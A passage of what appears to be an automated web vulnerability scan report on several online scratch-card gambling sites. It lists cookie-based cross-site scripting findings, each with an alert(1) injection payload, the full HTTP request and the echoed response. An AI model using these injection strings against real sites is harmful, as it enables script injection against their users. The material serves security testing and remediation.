Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:58 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45872


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM530ff"-alert(1)-"7f555105e68";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.233. http://www.hopa.com/ [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hopa.com
Path:   /

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd50c"-alert(1)-"8a8c36cbbdb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.hopa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; LanguageCode=ENG; RegistrationMode=PM; BO=FMbd50c"-alert(1)-"8a8c36cbbdb; CSI_4=EncryptedUniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=4; ASP.NET_SessionId=e01kb5453bgwt555nikmx12o;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/
Set-Cookie: BO=FMbd50c"-alert(1)-"8a8c36cbbdb; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/
Set-Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/
Set-Cookie: CSITemp=4; domain=hopa.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMbd50c"-alert(1)-"8a8c36cbbdb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.234. http://www.hopa.com/ [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hopa.com
Path:   /

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39c1f"-alert(1)-"7818844582d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.hopa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; LanguageCode=ENG; RegistrationMode=PM39c1f"-alert(1)-"7818844582d; BO=FM; CSI_4=EncryptedUniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=4; ASP.NET_SessionId=e01kb5453bgwt555nikmx12o;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:11:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM39c1f"-alert(1)-"7818844582d; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/
Set-Cookie: BO=FM; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/
Set-Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/
Set-Cookie: CSITemp=4; domain=hopa.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM39c1f"-alert(1)-"7818844582d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.235. http://www.info.crazyscratch.com/AboutUs.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ebf6"-alert(1)-"fd5c46226b0 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM4ebf6"-alert(1)-"fd5c46226b0; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: BO=FM4ebf6"-alert(1)-"fd5c46226b0; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:41 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57142


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4ebf6"-alert(1)-"fd5c46226b0";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.236. http://www.info.crazyscratch.com/AboutUs.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffd0a"-alert(1)-"8939955fc8f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PMffd0a"-alert(1)-"8939955fc8f; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMffd0a"-alert(1)-"8939955fc8f; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:04 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:04 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:04 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57142


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMffd0a"-alert(1)-"8939955fc8f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.237. http://www.info.crazyscratch.com/ContactUsFax.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsFax.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8e84"-alert(1)-"add043d468d was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FMf8e84"-alert(1)-"add043d468d; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:44 GMT; path=/
Set-Cookie: BO=FMf8e84"-alert(1)-"add043d468d; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:44 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:44 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMf8e84"-alert(1)-"add043d468d";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.238. http://www.info.crazyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsFax.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0dfe"-alert(1)-"834b470a99f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PMb0dfe"-alert(1)-"834b470a99f; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb0dfe"-alert(1)-"834b470a99f; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:08 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:08 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:08 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:08 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:08 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb0dfe"-alert(1)-"834b470a99f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.239. http://www.info.crazyscratch.com/ContactUsMail.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c555"-alert(1)-"c0fe908b235 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM6c555"-alert(1)-"c0fe908b235; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:22 GMT; path=/
Set-Cookie: BO=FM6c555"-alert(1)-"c0fe908b235; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:22 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:22 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62159


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM6c555"-alert(1)-"c0fe908b235";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.240. http://www.info.crazyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 719df"-alert(1)-"1b7344d7528 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM719df"-alert(1)-"1b7344d7528; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM719df"-alert(1)-"1b7344d7528; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:43 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:43 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:43 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:43 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62159


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM719df"-alert(1)-"1b7344d7528";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.241. http://www.info.crazyscratch.com/ContactUsTel.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsTel.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5421a"-alert(1)-"1e275a84da5 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM5421a"-alert(1)-"1e275a84da5; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:39 GMT; path=/
Set-Cookie: BO=FM5421a"-alert(1)-"1e275a84da5; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:39 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:39 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:39 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54496


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

